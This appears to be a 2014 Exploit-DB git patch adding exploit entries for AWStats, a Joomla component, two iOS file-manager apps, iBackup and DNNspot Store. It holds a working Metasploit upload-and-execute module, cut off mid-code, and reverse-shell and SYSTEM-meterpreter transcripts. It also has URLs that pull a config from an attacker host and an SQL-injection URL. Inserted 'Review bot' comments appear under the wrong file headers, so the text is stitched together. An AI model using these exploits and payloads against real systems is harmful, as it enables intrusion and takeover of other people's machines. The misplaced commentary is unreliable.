From b7c11b0dcd3c636e9286285f4a42f110027952b5 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 24 Oct 2014 04:45:15 +0000
Subject: [PATCH] Updated 10_24_2014

---
files.csv | 6 +
platforms/cgi/webapps/35035.txt | 13 ++
platforms/ios/webapps/35037.txt | 240 +++++++++++++++++++++++++++++
platforms/ios/webapps/35038.txt | 213 +++++++++++++++++++++++++
platforms/php/webapps/35036.txt | 7 +
platforms/windows/local/35040.txt | 108 +++++++++++++
platforms/windows/webapps/35039.rb | 111 +++++++++++++
7 files changed, 698 insertions(+)
create mode 100755 platforms/cgi/webapps/35035.txt
create mode 100755 platforms/ios/webapps/35037.txt
create mode 100755 platforms/ios/webapps/35038.txt
create mode 100755 platforms/php/webapps/35036.txt
create mode 100755 platforms/windows/local/35040.txt
create mode 100755 platforms/windows/webapps/35039.rb
diff --git a/files.csv b/files.csv
index cb7e21d95..d16d5bb9b 100755
--- a/files.csv
+++ b/files.csv
@@ -31548,3 +31548,9 @@ id,file,description,date,author,platform,type,port
 35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService Arbitrary File Upload",2014-10-21,metasploit,windows,remote,0
 35033,platforms/php/remote/35033.rb,"Joomla Akeeba Kickstart Unserialize Remote Code Execution",2014-10-21,metasploit,php,remote,80
 35034,platforms/multiple/remote/35034.rb,"HP Data Protector EXEC_INTEGUTIL Remote Code Execution",2014-10-21,metasploit,multiple,remote,5555
+35035,platforms/cgi/webapps/35035.txt,"Awstats 6.x Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability",2010-11-30,StenoPlasma,cgi,webapps,0
+35036,platforms/php/webapps/35036.txt,"Annuaire Component for Joomla! 'id' Parameter SQL Injection Vulnerability",2010-12-02,"Ashiyane Digital Security Team",php,webapps,0
+35037,platforms/ios/webapps/35037.txt,"iFunBox Free 1.1 iOS - File Inclusion Vulnerability",2014-10-22,Vulnerability-Lab,ios,webapps,8000
+35038,platforms/ios/webapps/35038.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-22,Vulnerability-Lab,ios,webapps,80
+35039,platforms/windows/webapps/35039.rb,"DotNetNuke DNNspot Store 3.0.0 Arbitary File Upload",2014-10-22,"Glafkos Charalambous ",windows,webapps,0
+35040,platforms/windows/local/35040.txt,"iBackup 10.0.0.32 - Local Privilege Escalation",2014-10-22,"Glafkos Charalambous ",windows,local,0
diff --git a/platforms/cgi/webapps/35035.txt b/platforms/cgi/webapps/35035.txt
new file mode 100755
index 000000000..e243b9bb0
--- /dev/null
+++ b/platforms/cgi/webapps/35035.txt
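Review bot: The new 35039 row misspells `Arbitary` (should be `Arbitrary`), and both rows by the same author carry a trailing space inside the quoted author field (`"Glafkos Charalambous "`), unlike every other author value in the visible context. The same misspelling appears in the `'Name'` string of platforms/windows/webapps/35039.rb in this commit, so both should be corrected together; the author field should be `"Glafkos Charalambous"` or, following the unquoted style of the neighbouring rows, left unquoted once the trailing space is gone.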
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/45123/info
+
+Awstats is prone to an arbitrary command-execution vulnerability. This issue occurs when Awstats is used along with Apache Tomcat in Microsoft Windows.
+
+An attacker can exploit this vulnerability to execute arbitrary shell commands in the context of the webserver process. This may help attackers compromise the underlying system; other attacks are also possible.
+
+AWStats 6.95 and prior versions are vulnerable.
+
+Attacking Windows XP Apache Tomcat AWStats Server:
+http://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress:80\webdav
+
+Attacking Windows 2003 or Windows XP AWStats Server:
+http://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress\SMB-Share
\ No newline at end of file
diff --git a/platforms/ios/webapps/35037.txt b/platforms/ios/webapps/35037.txt
new file mode 100755
index 000000000..d46637283
--- /dev/null
+++ b/platforms/ios/webapps/35037.txt
@@ -0,0 +1,240 @@
+Document Title:
+===============
+iFunBox Free v1.1 iOS - File Include Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1344
+
+
+Release Date:
+=============
+2014-10-20
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1344
+
+
+Common Vulnerability Scoring System:
+====================================
+6.4
+
+
+Product & Service Introduction:
+===============================
+iFunBox is a powerful file transfer and manage tool. You can use it to transfer files between Apple devices.
+It’s also a full-function file explorer, with user-friendly UI and simple operations.
+
+(Copy of the Homepage: https://itunes.apple.com/de/app/ifunbox-free/id882209383 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official iFunBox Free v1.1 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-10-20: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Nguyen Anh
+Product: iFunBox Free - iOS Mobile Web Application 1.1
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A local file include web vulnerability has been discovered in the official iFunBox Free v1.1 iOS mobile web-application.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
+specific path commands to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `upload` module. 
Remote attackers are able to inject own files with malicious
+`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs
+in the index dir listing of the wifi interface context. The attacker is able to inject the local file include request by usage of the `wifi
+interface` in connection with the vulnerable upload request.
+
+Remote attackers are also able to exploit the filename/albumname validation issue in combination with persistent injected script codes to execute
+different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST.
+
+The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
+Exploitation of the local file include vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
+of the local file include web vulnerability results in mobile application or connected device component compromise.
+
+Request Method(s):
+ [+] POST
+
+Vulnerable Module(s):
+ [+] Upload (File)
+
+Vulnerable Parameter(s):
+ [+] filename
+
+Affected Module(s):
+ [+] iToolZip Wifi Interface (localhost:80000)
+
+
+Proof of Concept (PoC):
+=======================
+The local file include vulnerability can be exploited by local attackers without user interaction or privileged application user account.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
+
+1. Install the mobile app to your local iOS device (iphone or ipad) [https://itunes.apple.com/de/app/ifunbox-free/id882209383]
+2. Start the app and push in the right top corner the wifi transfer button
+3. Take another device or computer that allows you to access the wifi file transfer interface (localhost:8000)
+4. 
Now, the attacker uploads a file and tampers the request to manipulate the session information live
+Note: He injects a payload to request a local file through the vulnerable filename value in the upload POSt emthod request
+5. The code execution occurs in the inject in the wifi file dir listing web interface index (localhost:8000:8000/./[LOCAL FILE INCLUDE VULNERABILITY!].png)
+6. Successful reproduce of the security vulnerability!
+
+
+PoC: index.html (Name) [createdir?path=]
+
+
+ + + +
NameDownloadDelete
<./[LOCAL FILE INCLUDE VULNERABILITY!].png">./[LOCAL FILE INCLUDE VULNERABILITY!].png +
Applications +Documents +GamesMusicsPictures +Videos + + +--- PoC Session Logs [GET] --- +Status: 302[Found] +POST http://localhost:8000:8000/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8000:8000] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8000:8000/] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------94243140032725 +Content-Disposition: form-data; name="newfile"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!].png" +Content-Type: image/png +- +Status: 200[OK] +GET http://localhost:8000:8000/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[5753] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8000:8000] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8000:8000/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[5753] + Date[Sun, 19 Oct 2014 17:05:59 GMT] +- +Status: 200[OK] +GET http://localhost:8000:8000/files?p= Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[369] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8000:8000] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[application/json, text/javascript, */*] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost:8000:8000/] + Connection[keep-alive] + Response Header: + 
Accept-Ranges[bytes]
+ Content-Length[369]
+ Date[Sun, 19 Oct 2014 17:06:00 GMT]
+-
+Status: 200[OK]
+GET http://localhost:8000:8000/./[LOCAL FILE INCLUDE VULNERABILITY!].png Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8000:8000]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
+ Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Referer[http://localhost:8000:8000/]
+ Connection[keep-alive]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[0]
+ Date[Sun, 19 Oct 2014 17:06:01 GMT]
+
+
+Solution - Fix & Patch:
+=======================
+The file include web vulnerability can be patched by a secure parse and encode of the filename in the upload POST method request.
+To prevent the execution filter the input and restrict it on input but encode also the iToolZip wifi interface file dir list with the vulnerable name output value.
+
+
+Security Risk:
+==============
+The security risk of the local file include web vulnerability in the iToolZo wifi web interface is estimated as high. (CVSS 6.4)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
+expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
+are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
+if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. 
Some states do not allow the exclusion or limitation
+of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
+any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
+Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+ Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+
+--
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/ios/webapps/35038.txt b/platforms/ios/webapps/35038.txt
new file mode 100755
index 000000000..eab0c86f3
--- /dev/null
+++ b/platforms/ios/webapps/35038.txt
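Review bot: The affected-module line gives the wifi interface as `localhost:80000` while the PoC steps say `localhost:8000` and every session-log URL shows `localhost:8000:8000`; a reader cannot tell which is the real listening port, so the advisory should state one port (the files.csv row for this entry lists 8000) and say whether the doubled-port form is a logging artifact. What the PoC and logs actually show is a crafted multipart `filename` being echoed unencoded into the directory listing, which the text itself also calls persistent script injection, so "local file include" may overstate the vulnerability class; the fix section's advice to validate the filename on input and encode it in the listing output is the relevant mitigation either way. The product is named iFunBox in the title but `iToolZip` and `iToolZo` in the module and risk sections, which should be reconciled.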
@@ -0,0 +1,213 @@
+Document Title:
+===============
+File Manager v4.2.10 iOS - Code Execution Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1343
+
+
+Release Date:
+=============
+2014-10-21
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1343
+
+
+Common Vulnerability Scoring System:
+====================================
+9
+
+
+Product & Service Introduction:
+===============================
+Try a file manager that’s unmatched in functionality and reliability. It was created to manage your cloud services like GoogleDrive, Dropbox,
+Box, OneDrive, Yandex.Disk, and network services like FTP, SFTP, SMB, WebDAV, DLNA, photo galleries and files on your device. Manage all of
+your stored data like sub-folders - copy, move, rename or compress to archive your folders and files. It supports all possible archive
+formats: Zip, Rar, 7z, tar, gz, bz2. You can protect your folders and files with a password and view photo, video and audio content, as well
+as documents. This application will be a great help for everyday tasks. Copy a folder from one cloud service to any other - easy! Quickly move
+a folder from an archive to a cloud service - easy! Copy your gallery to a network or cloud service - easy!
+
+(Copy of the Homepage: https://itunes.apple.com/de/app/file-manager-pro-manage-your/id926125881 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research team discovered a code execution vulnerability in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application. 
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-10-21: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+DevelSoftware LTD
+Product: File Manager - iOS Mobile Web Application (Wifi) 4.2.10
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Critical
+
+
+Technical Details & Description:
+================================
+A code execution vulnerability has been discovered in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
+The issue allows an attacker to compromise the application and connected device components by exploitation of a system specific code
+execution vulnerability in the wifi interface.
+
+The vulnerability is located in the `Create Folder` input field of the index.html wifi web interface. The function create the path value
+without any protection or filter mechanism in the GET method request. Remote attackers are able to manipulate the GET method request by
+usage of the `createdir?path=` parameter to compromise the application or device. The execution of the code occurs in the index.html file
+next to the name output context of the wifi share file dir listing. The attack vector is located on the application-side of the mobile app
+and the request method to inject is GET.
+
+The security risk of the remote code execution web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.8
+Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction.
+Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected device component compromise. 
+
+
+Request Method(s):
+ [+] GET
+
+Vulnerable Module(s):
+ [+] Create Folder
+
+Vulnerable Parameter(s):
+ [+] createdir?path=(name)
+
+Affected Module(s):
+ [+] Wifi Interface (index.html)
+
+
+Proof of Concept (PoC):
+=======================
+The code execution vulnerability can be exploited by attackers in the same local wifi without user interaction or pass code authorization.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
+
+1. Install the mobile app to your local iOS device (iphone or ipad) [https://itunes.apple.com/de/app/file-manager-pro-manage-your/id926125881]
+2. Start the app and push in the left corner the wifi transfer button
+3. Take another device or computer that allows you to access the wifi file transfer interface (localhost:80)
+4. Now, inject own code as payload by usage of the create folder input field
+Note: The input field requests the path value directly via GET method request without secure parse or encode
+5. The code execution occurs directly after the inject in the index.html file of the web interface
+6. Successful reproduce of the security vulnerability!
+
+
+PoC: index.html (Name) [createdir?path=]
+
+
+ + + + + + + +
+
+
+ + + + +
NameExtSize
>-[CODE EXECUTION VULNERABILITY!]>dir
testfolder1dir
testfolder2dir
+
+
+--- PoC Session Logs [GET] ---
+Status: 200[OK]
+GET http://localhost:80/createdir?path=%2F%3E%22%3C-[CODE EXECUTION VULNERABILITY!];%3E Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[43] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:80]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
+ Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Referer[http://localhost:80/index.html]
+ Connection[keep-alive]
+ Response Header:
+ Connection[Keep-Alive]
+ Content-Length[43]
+
+
+Status: 200[OK]
+GET http://localhost:80/-[CODE EXECUTION VULNERABILITY]; Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:80]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
+ Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Referer[http://localhost:80/index.html]
+ Connection[keep-alive]
+ Response Header:
+ Connection[Close]
+ Date[Sun, 19 Oct 2014 16:22:46 GMT]
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure restriction and parse of the create folder input field. Encode also the vulnerable name value in the
+index.html file to prevent application-side code execution attacks.
+
+
+Security Risk:
+==============
+The security risk of the code execution web vulnerability in the path value is estimated as critical. (CVSS 8.8)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. 
Vulnerability Lab disclaims all warranties, either
+expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
+are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
+if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
+of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
+any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
+Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
+is trademark of vulnerability-lab team & the specific authors or managers. 
To record, list (feed), modify, use or edit our material contact
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+ Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+--
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/php/webapps/35036.txt b/platforms/php/webapps/35036.txt
new file mode 100755
index 000000000..b92283277
--- /dev/null
+++ b/platforms/php/webapps/35036.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/45147/info
+
+The Annuaire component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_annuaire&view=annuaire&type=cat&id=[SQLi]
\ No newline at end of file
diff --git a/platforms/windows/local/35040.txt b/platforms/windows/local/35040.txt
new file mode 100755
index 000000000..f48439c15
--- /dev/null
+++ b/platforms/windows/local/35040.txt
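Review bot: The CVSS score in this advisory is inconsistent: the header block gives `9`, while the Technical Details paragraph and the Security Risk section both give 8.8, so one of them should be corrected. What the PoC and session logs demonstrate appears to be the `createdir?path=` value written unencoded into the name column of index.html, with the browser then requesting the injected name as a URL, which reads as markup/script injection in the wifi web interface rather than system-level code execution; a sentence drawing that distinction would help readers weigh the "Critical" rating. The fix section already names the right mitigations (restrict and validate the folder name, encode it on output), and the remark that the pass code is blank by default deserves its own line as a user-side hardening step.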
@@ -0,0 +1,108 @@
+# Exploit Title: iBackup <= 10.0.0.32 Local Privilege Escalation
+# Date: 23/01/2014
+# Author: Glafkos Charalambous
+# Version: 10.0.0.32
+# Vendor: IBackup
+# Vendor URL: https://www.ibackup.com/
+# CVE-2014-5507
+
+
+Vulnerability Details
+There are weak permissions for IBackupWindows default installation where everyone is allowed to change
+the ib_service.exe with an executable of their choice. When the service restarts or the system reboots
+the attacker payload will execute on the system with SYSTEM privileges.
+
+
+C:\Users\0x414141>icacls "C:\Program Files\IBackupWindows\ib_service.exe"
+C:\Program Files\IBackupWindows\ib_service.exe Everyone:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ BUILTIN\Administrators:(I)(F)
+ BUILTIN\Users:(I)(RX)
+
+Successfully processed 1 files; Failed processing 0 files
+
+
+C:\Users\0x414141>sc qc IBService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: IBService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : "C:\Program Files\IBackupWindows\ib_service.exe"
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : IBackup Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+
+msf exploit(service_permissions) > sessions
+
+Active sessions
+===============
+
+ Id Type Information Connection
+ -- ---- ----------- ----------
+ 1 meterpreter x86/win32 0x414141-PC\0x414141 @ 0x414141-PC 192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)
+
+
+
+msf exploit(service_permissions) > show options
+
+Module options (exploit/windows/local/service_permissions):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ AGGRESSIVE true no Exploit as many services as possible (dangerous)
+ SESSION 1 yes The session to run this module on. 
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)
+ LHOST 192.168.0.100 yes The listen address
+ LPORT 4444 yes The listen port
+
+
+Exploit target:
+
+ Id Name
+ -- ----
+ 0 Automatic
+
+
+msf exploit(service_permissions) > exploit
+
+[*] Started reverse handler on 192.168.0.100:4444
+[*] Meterpreter stager executable 15872 bytes long being uploaded..
+[*] Trying to add a new service...
+[*] No privs to create a service...
+[*] Trying to find weak permissions in existing services..
+[*] IBService has weak file permissions - C:\Program Files\IBackupWindows\ib_service.exe moved to C:\Program Files\IBackupWindows\ib_service.exe.bak and replaced.
+[*] Restarting IBService
+[*] Could not restart IBService. Wait for a reboot. (or force one yourself)
+
+Upon Reboot or Service Restart
+
+[*] Sending stage (770048 bytes) to 192.168.0.102
+[*] Meterpreter session 2 opened (192.168.0.100:4444 -> 192.168.0.102:14852) at 2014-07-21 00:52:36 +0300
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > background
+[*] Backgrounding session 2...
+
+msf exploit(service_permissions) > sessions -l
+
+Active sessions
+===============
+
+ Id Type Information Connection
+ -- ---- ----------- ----------
+ 1 meterpreter x86/win32 0x414141-PC\0x414141 @ 0x414141-PC 192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)
+ 2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ 0x414141-PC 192.168.0.100:4444 -> 192.168.0.102:14852 (192.168.0.102)
+
+
diff --git a/platforms/windows/webapps/35039.rb b/platforms/windows/webapps/35039.rb
new file mode 100755
index 000000000..ee30ffb84
--- /dev/null
+++ b/platforms/windows/webapps/35039.rb
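Review bot: The advisory shows the weak ACL (`Everyone:(I)(F)` on ib_service.exe, the `(I)` flag meaning the entry is inherited from the parent directory) but gives no remediation or detection guidance. A short "Mitigation" section would help: remove the Everyone full-control entry from the IBackupWindows directory so the service binary is writable only by Administrators and SYSTEM, and confirm with the same `icacls` command shown. The Metasploit transcript also records the original binary being moved to `ib_service.exe.bak` and replaced, which is exactly the kind of service-binary change that file-integrity monitoring or service-configuration auditing can alert on, and that is worth stating for defenders. The header `Date: 23/01/2014` predates the July 2014 session timestamps and the CVE assignment, so the advisory should say which is the discovery date and which the publication date.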
@@ -0,0 +1,111 @@
+?# Exploit Title: DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload
+# Date: 23/01/2014
+# Author: Glafkos Charalambous
+# Version: 3.0.0
+# Vendor: DNNspot
+# Vendor URL: https://www.dnnspot.com
+# Google Dork: inurl:/DesktopModules/DNNspot-Store/
+#
+# root@kali:~# msfcli exploit/windows/http/dnnspot_upload_exec payload=windows/shell/reverse_tcp LHOST=192.168.13.37 LPORT=31337 RHOST=192.168.31.33 RPORT=80 E
+# [*] Initializing modules...
+# payload => windows/shell/reverse_tcp
+# LHOST => 192.168.13.37
+# LPORT => 31337
+# RHOST => 192.168.31.33
+# [-] Handler failed to bind to 192.168.13.37:31337
+# [*] Started reverse handler on 0.0.0.0:31337
+# [*] 192.168.31.33:80 - Uploading payload...
+# [*] 192.168.31.33:80 - Executing payload trrnegmv.aspx
+# [*] Encoded stage with x86/shikata_ga_nai
+# [*] Sending encoded stage (267 bytes) to 192.168.31.33
+# [*] Command shell session 1 opened (192.168.13.37:31337 -> 192.168.31.33:56806) at 2014-08-28 20:56:23 +0300
+# [+] Deleted trrnegmv.aspx
+#
+# Microsoft Windows [Version 6.2.9200]
+# (c) 2012 Microsoft Corporation. All rights reserved.
+#
+# C:\Windows\SysWOW64\inetsrv>
+#
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload',
+ 'Description' => %q{
+ This module exploits an arbitrary file upload vulnerability found in DotNetNuke DNNspot Store
+ module versions below 3.0.0. 
+ },
+ 'Author' =>
+ [
+ 'Glafkos Charalambous '
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://metasploit.com' ]
+ ],
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ 'Privileged' => false,
+ 'Targets' =>
+ [
+ [ 'DNNspot-Store / Windows', {} ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Jul 21 2014'))
+ end
+
+ def check
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx")
+ })
+
+ if res and res.code == 200
+ return Exploit::CheckCode::Detected
+ else
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ def exploit
+ @payload_name = "#{rand_text_alpha_lower(8)}.aspx"
+ exe = generate_payload_exe
+ aspx = Msf::Util::EXE.to_exe_aspx(exe)
+ post_data = Rex::MIME::Message.new
+ post_data.add_part(aspx, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
+ post_data.add_part("/DesktopModules/DNNspot-Store/ProductPhotos/", nil, nil, "form-data; name=\"folder\"")
+ post_data.add_part("1", nil, nil, "form-data; name=\"productId\"")
+ post_data.add_part("w00t", nil, nil, "form-data; name=\"type\"")
+ data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+
+ print_status("#{peer} - Uploading payload...")
+ res = send_request_cgi({
+ "method" => "POST",
+ "uri" => normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx"),
+ "data" => data,
+ "ctype" => "multipart/form-data; boundary=#{post_data.bound}"
+ })
+
+ unless res and res.code == 200
+ fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+ end
+
+ register_files_for_cleanup(@payload_name)
+
+ print_status("#{peer} - Executing payload #{@payload_name}")
+ res = send_request_cgi({
+ 'method' => 'GET',
